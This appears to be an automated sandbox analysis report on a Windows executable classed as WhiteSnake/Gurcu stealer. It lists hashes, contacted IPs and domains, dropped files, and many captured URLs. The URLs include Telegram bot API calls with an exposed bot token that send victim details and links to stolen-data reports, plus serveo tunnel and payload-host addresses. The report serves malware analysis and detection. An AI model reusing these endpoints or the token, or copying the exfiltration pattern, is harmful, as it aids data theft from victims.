
jqOHOuPMJP.exe

Status: finished
Submission Time: 2024-02-10 16:16:06 +01:00
Malicious
Trojan
Spyware
Evader
Gurcu Stealer, WhiteSnake Stealer

Comments

Tags

  • exe
  • WhiteSnakeStealer

Details

  • Analysis ID:
    1390172
  • API (Web) ID:
    1390172
  • Original Filename:
    7e9a93c69aecfc2bbda9470fbd4556db.exe
  • Analysis Started:
    2024-02-10 16:16:06 +01:00
  • Analysis Finished:
    2024-02-10 16:28:33 +01:00
  • MD5:
    7e9a93c69aecfc2bbda9470fbd4556db
  • SHA1:
    ab0e810472a897affac1a761b49595939f6897a9
  • SHA256:
    82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
  • Technologies:

Joe Sandbox

Engine Download Report Detection Info
malicious
malicious
Score: 100
System: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01

Third Party Analysis Engines

malicious
Score: 17/70
malicious
Score: 5/38
malicious

IPs

IP               Country
82.147.85.194    Russian Federation
208.95.112.1     United States
149.154.167.220  United Kingdom
138.68.79.95     United States
185.119.118.59   Austria

Domains

Name              IP
serveo.net        138.68.79.95
ip-api.com        208.95.112.1
api.telegram.org  149.154.167.220

URLs

Name Detection
http://pesterbdd.com/images/Pester.png
https://api.tele
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
http://185.217.98.121:8080
https://contoso.com/
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
http://18.228.80.130:80
http://www.w3.
https://164.90.185.9:443
http://104.248.208.221:80
https://44.228.161.50:443
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
http://nuget.org/NuGet.exe
https://contoso.com/License
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2FT4zYCSr1rm%2F41r0r_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
https://api.telegram.org
http://185.217.98.121:80
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
http://212.6.44.53:8080
http://154.26.128.6:80
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.16Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F185.119.118.59%3A8080%2Fget%2Fs9VbfeJdTs%2FhkLYW_user%40468325_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML
http://api.telegram.org
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
http://45.61.136.13:80
http://82.147.85.194
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
http://crl.v
http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
https://support.mozilla.org
http://127.0.0.1:18772/handleOpenWSR?r=
http://206.189.109.146:80
http://116.202.101.219:8080
https://ac.ecosia.org/autocomplete?q=
https://185.217.98.121:443
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
http://185.119.118.59:8080/hkLYW_user
http://149.88.44.159:80
http://127.0.0.1:6787/ing=no
http://upx.sf.net
http://82.147.85.194/byte/
https://18.178.28.151:443
http://pesterbdd.com/i?
http://144.126.132.141:8080
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
https://e483612b93e055308d0c85f365c474ee.serveo.net
https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
http://193.142.58.127:80Pk
http://185.119.118.59:80802
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
http://ip-api.com
https://nuget.org/nuget.exe
http://66.42.56.128:80
https://aka.ms/pscore6lB
http://ip-api.com/line?fields=query,country
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe483612b93e055308d0c85f365c474ee.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
https://e483612b93e055308d0c85f365c474ee.serveo.net/
https://192.99.196.191:443
https://13.231.21.109:443
http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
https://64.227.21.98:443
http://107.161.20.142:8080
http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
http://185.119.118.59:8080
https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=5169773349&text=%23Default%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E468325%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2Fe2111f95f52ba8be6b2d3394e38b1722.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTML
https://e2111f95f52ba8be6b2d3394e38b1722.se
https://api.telegram.org/bot
http://23.224.102.6:8001
https://duckduckgo.com/ac/?q=
https://duckduckgo.com/chrome_newtab
http://216.250.190.139:80
http://www.microsoft.co(=
http://23.248.176.37:180
http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
http://schemas.xmlsoap.org/wsdl/
http://45.61.136.52:80
http://127.0.0.1:
http://185.119.118.59
https://github.com/Pester/Pester
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
https://www.ecosia.org/newtab/
http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
http://ip-api.com/line?fields=query
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
http://193.142.58.127:80
http://82.147.85.194/byte/@jokerbot880901.txt
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
https://contoso.com/Icon
http://www.apache.org/licenses/LICENSE-2.0.html
http://schemas.xmlsoap.org/soap/encoding/
http://82.147.85
http://127.0.0.1:6787/
http://129.151.109.160:8080
http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
http://185.119.118.59:8080/get
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Dropped files

Name / File Type

  • C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
    PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
  • C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
    PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows